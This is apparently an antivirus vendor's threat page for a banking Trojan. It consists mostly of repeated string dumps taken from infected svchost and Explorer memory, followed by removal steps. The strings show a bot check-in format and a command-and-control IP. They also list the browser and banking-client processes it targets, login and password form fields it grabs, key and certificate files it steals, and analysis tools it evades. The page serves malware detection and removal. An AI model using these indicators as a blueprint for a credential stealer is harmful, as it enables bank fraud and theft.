SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
%s\%s
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
dbghelp.dll
MSVCRT.dll
PSAPI.DLL
NETAPI32.dll
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
RegDeleteKeyA
ADVAPI32.dll
?456789:;<=
!"#$%&'()* ,-./0123
;3 #>6.&
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
.Prev
.current
1-191j1w1}1
?"?(?-?~?
;-;5;=;^;|;
7"7)7\7~7
6 6$6(6,6064686
mavast.com
ya.ru
serverkey.dat
\windows\

svchost.exe_1184_rwx_00C90000_0006A000:




.text
`.rdata
@.data
.reloc
<>http
PSShL
SSShp
tUSSSh
SSShp;
SSSh0 
SSShpk
SSShpF
t9SSSh
u1SSShP
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
C:\iDEFENSE
\\.\NPF_NdisWanIp
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\winlogon.exe
sysinfo.log
scr.bmp
minidump.bin
%d.%d.%d.%d
Ý %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.4.10
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
/search.php
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
%s\%s
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
dbghelp.dll
MSVCRT.dll
PSAPI.DLL
NETAPI32.dll
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
RegDeleteKeyA
ADVAPI32.dll
?456789:;<=
!"#$%&'()* ,-./0123
;3 #>6.&
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
.Prev
.current
LOCALSERVICE!XP1!F9BE9A8A
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.ffffff00
%Documents and Settings%\LocalService\Application Data\
1-191j1w1}1
?"?(?-?~?
;-;5;=;^;|;
7"7)7\7~7
6 6$6(6,6064686
mavast.com
ya.ru
serverkey.dat
\windows\

Explorer.EXE_1988_rwx_01E00000_0005B000:




.text
`.data
.reloc
`.rdata
@.data
<>http
PSShL
SSShp
tUSSSh
SSShp;
SSSh0 
SSShpk
SSShpF
t9SSSh
u1SSShP
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
C:\iDEFENSE
\\.\NPF_NdisWanIp
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\winlogon.exe
sysinfo.log
scr.bmp
minidump.bin
%d.%d.%d.%d
Ý %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.4.10
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
/search.php
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
%s\%s
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
dbghelp.dll
MSVCRT.dll
PSAPI.DLL
NETAPI32.dll
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
RegDeleteKeyA
ADVAPI32.dll
?456789:;<=
!"#$%&'()* ,-./0123
;3 #>6.&
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
.Prev
.current
1-191j1w1}1
?"?(?-?~?
;-;5;=;^;|;
7"7)7\7~7
6 6$6(6,6064686
mavast.com
ya.ru
serverkey.dat
\windows\

Explorer.EXE_1988_rwx_01E60000_0006A000:




.text
`.rdata
@.data
.reloc
<>http
PSShL
SSShp
tUSSSh
SSShp;
SSSh0 
SSShpk
SSShpF
t9SSSh
u1SSShP
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
C:\iDEFENSE
\\.\NPF_NdisWanIp
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\winlogon.exe
sysinfo.log
scr.bmp
minidump.bin
%d.%d.%d.%d
Ý %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.4.10
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
/search.php
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
%s\%s
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
dbghelp.dll
MSVCRT.dll
PSAPI.DLL
NETAPI32.dll
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
RegDeleteKeyA
ADVAPI32.dll
?456789:;<=
!"#$%&'()* ,-./0123
;3 #>6.&
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
.Prev
.current
ADM!XP1!F9BE9A8A
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.ffffff00
%Documents and Settings%\%current user%\Application Data\
1-191j1w1}1
?"?(?-?~?
;-;5;=;^;|;
7"7)7\7~7
6 6$6(6,6064686
mavast.com
ya.ru
serverkey.dat
\windows\






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Scan a system with an anti-rootkit tool.
    2. 

  2. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    %original file name%.exe:1860
    

    3. 

  3. Delete the original Trojan file.
    4. 

  4. Delete or disinfect the following files created/modified by the Trojan:
    

    %WinDir%\AppPatch\fciniiq.exe (1765 bytes)
    %System%\config\software (2440 bytes)
    %System%\config\SOFTWARE.LOG (5347 bytes)
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now